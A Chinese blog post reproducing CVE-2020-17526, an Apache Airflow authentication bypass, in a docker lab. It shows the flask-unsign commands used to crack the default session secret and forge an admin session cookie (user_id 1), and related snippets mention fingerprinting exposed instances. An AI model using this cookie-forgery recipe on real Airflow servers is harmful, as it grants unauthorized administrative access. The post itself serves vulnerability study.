Apache Airflow 身份验证绕过 (CVE-2020-17526)

于 2024-02-21 17:39:29 发布
阅读量301 收藏 1
点赞数 7
分类专栏: apache漏洞 文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53639243/article/details/136216354
版权

Apache Airflow 是一个开源的分布式任务调度框架。尽管默认情况下不需要身份验证,但管理部门可以指定 webserver.authenticate=True 来启用它。在 1.10.13 之前的版本中,Apache Airflow 使用默认会话 secert 密钥,这会导致在启用身份验证时模拟任意用户。

复现:docker 搭建环境

#Initialize the database
docker-compose run airflow-init

#Start service
docker-compose up -d

访问网站 http://192.168.92.130:8080查看 Apache Airflow 的登录页面http://192.168.92.130:8080

 首先,浏览登录页面并从 Cookie 获取会话字符串:eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiMDZmODZhY2QzY2JhNGQwZDI0ZGM0ODA5MTAzNWY2YzgyMTQ3YmM5YiJ9.ZdW-Kg.TcsL80HkILvoOEgJz9z9xu_44js

然后,使用flask-unsign 破解会话密钥: 

我们得到了有效的会话密钥 temporary_key 。然后,使用此键生成一个新会话,其 user_id 等于 1 : 

flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"

eyJ1c2VyX2lkIjoiMSIsIl9mcmVzaCI6ZmFsc2UsIl9wZXJtYW5lbnQiOnRydWV9.ZdXEJQ.7_tLRZB4eyTA2AoYf-9mH0MbnHM

使用EditThisCookie 粘贴session值然后刷新一下页面

 

青梅fox
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
airflow-code-editor:Apache Airflow的插件,可让您在浏览器中编辑DAG
04-27
您可以在[code_editor]部分中添加以下任何设置来编辑airflow.cfg 。 git_cmd git命令(可选路径) git_default_args git参数添加到每个调用中(默认值:-c color.ui = true) git_author_name作者/提交者中易于...
Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)
Rin_CSDN
10-17 462
利用CVE-2020-11978存在的漏洞即可。
漏洞复现----49、Apache Airflow 身份验证绕过 (CVE-2020-17526)
七天
07-06 2579
Apache Airflow 身份验证绕过 (CVE-2020-17526)
Apache Airflow 身份验证绕过 (CVE-2020-17526)
最新发布
qq_63963927的博客
10-25 126
Apache Airflow是python语言编写的一个以编程方式创作、安排和监控工作流程的平台。除了几个服务器端 python 脚本之外,它还有一个基于Flask编写的Web应用程序,该Web 应用程序 使用Flask 的无状态签名 cookie 来存储和管理成功的身份验证。在安装过程中,可以使用Airflow命令创建用户,在文档中该用户是具有管理员角色的用户。任何后续用户都可以使用Airflow python 脚本从 Web 界面或命令行创建。
Apache Airflow 错误的会话验证漏洞 (CVE-2020-17526)利用
weixin_40418457的博客
06-22 1002
0x01 漏洞描述 Apache 官方在2020年12月21日发布的邮件中披露Apache Airflow 存在一个由于错误处理会话验证导致的未授权访问漏洞。如果用户使用了默认的秘钥配置,攻击者就可以在其他的一个配置了默认秘钥的站点进行登录,接着以登录后的session信息直接未授权访问受害者站点。 引用:https://mp.weixin.qq.com/s/EN4bsZl1ylpAtpIlISK3nQ 0x02 漏洞利用 FOFA指纹: title=="Airflow - Login&q
Python库 | apache-airflow-providers-apache-spark-2.1.3.tar.gz
04-06
资源分类:Python库 所属语言:Python 资源全名:apache-airflow-providers-apache-spark-2.1.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
dag-factory:从YAML配置文件动态生成Apache Airflow DAG
05-13
它需要Python 3.6.0+和Apache Airflow 1.10+。 用法 在Airflow环境中安装dag-factory之后,有两个步骤来创建DAG。 首先,我们需要创建一个YAML配置文件。 例如: example_dag1 : default_args : owner : ' ...
airflow-client-go:Apache Airflow-Go的OpenApi客户端
05-17
"github.com/apache/airflow-client-go/airflow" ) func main () { cli := airflow . NewAPIClient ( & airflow. Configuration { Scheme : "http" , Host : "localhost:8080" , BasePath : "/api/v1" , })...
airflow详细配置说明
permike的专栏
08-11 7942
[core] # The home folder for airflow, default is ~/airflow airflow_home = /home/frappe/airflow # The folder where your airflow pipelines live, most likely a # subfolder in a code repository dags_fold
史上最完整的AirFlow2.1.2版本安装教程
逆流而上Mr李
08-17 3217
hello,大家好,我是阿周,上周我们讲解了AirFlow的一些基本概念,请看文章:学会AirFlow调度工作流平台,让你告别加班,老板还会升值加薪,但是只知道理论知识是不行的,所以接下来我将带领大家一块安装部署,通过实战学会airflow。 1、Anaconda环境准备 由于Airflow2.1.2版本依赖于python3高阶版本,但是服务器中一般默认python2.7.5版本,如下图: 所以,我们直接通过部署miniconda,创建虚拟python3环境就可以满足airflow的要求。 1.
airflow 使用心得,从环境到部署上线
猴子饲养员的博客
05-12 7332
使用版本: python 3.6.8 apache-airflow 1.10.3 安装 python 环境准备 apache-airflow 对于 python 版本限制如下: requires Python '>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*' # wget 用于下载源码包, gcc 和 make 用于编译 yum instal...
Airflow使用入门指南
热门推荐
悟道西方
11-07 6万+
Airflow能做什么Airflow是一个工作流分配管理系统,通过有向非循环图的方式管理任务流程,设置任务依赖关系和时间调度。Airflow独立于我们要运行的任务,只需要把任务的名字和运行方式提供给Airflow作为一个task就可以。安装和使用最简单安装在Linux终端运行如下命令 (需要已安装好python2.x和pip):pip install airflow pip install "air
airflow的安装和配置
python_tty的专栏
12-14 3265
安装 virtualenv airflow export AIRFLOW_HOME=~/airflow source airflow/bin/activate pip install airflow 这个过程时间有点长,airflow安装了很多依赖包,数据库同步工具alembic, orm工具sqlalchemy, flask等 2.初始化数据库 airflow默认的数据库是sql
centos7 安装部署airflow
vkingnew 的技术博客
01-16 1660
运行环境: python 3.6.6 apache airflow 1.10.1 mysql 5.7.24 centos7: --准备工作: rpm -ivh https://centos7.iuscommunity.org/ius-release.rpm yum install epel-release 或者 rpm -ivh https://dl.fedoraproject.org/p...
Airflow 1.10安装
mnasd的博客
11-17 3796
前言 本次安装Airflow版本为1.10,其需要依赖Python和DB,本次选择的DB为Mysql。 本次安装组件及版本如下: Airflow == 1.10 Python == 3.6.5 Mysql == 5.7 Python安装 略 详见:Python3安装(Linux环境) 安装mysql 略 详见:http://note.youdao.com/noteshare?i...
airflow分布式部署踩坑记录之其他篇<3>
记录点滴成长......
07-20 3154
Q1:怎么进行分布式部署? airflow celery采用的是消息队列的方式生产任务,分发任务和执行任务,所以想要进行分布式部署,只需要在不同机器上部署完全一样的airflow服务,在borker节点上开启airflow的webserver,scheduler,flower服务以及mysql服务和rabbitMQ服务,在其他机器上设置和borker节点上相同的配置信息,并且只开启worke...
CVE-2020-11978
08-10
回答:CVE-2020-11978是Apache Airflow中的一个命令注入漏洞。根据引用中提到的博文,漏洞可以通过复现来进行验证。要进行复现,可以使用vulhub靶场中的CVE-2020-11978文件夹,并按照指示输入相关命令启动docker-compose来搭建环境。需要注意的是,由于技术文章具有时效性,建议查看文章出处以获取最新版本的信息。123 #### 引用[.reference_title] - *1* *2* *3* [(CVE-2020-11978)Airflow dag中的命令注入漏洞复现【vulhub靶场】](https://blog.csdn.net/weixin_43847838/article/details/125349343)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值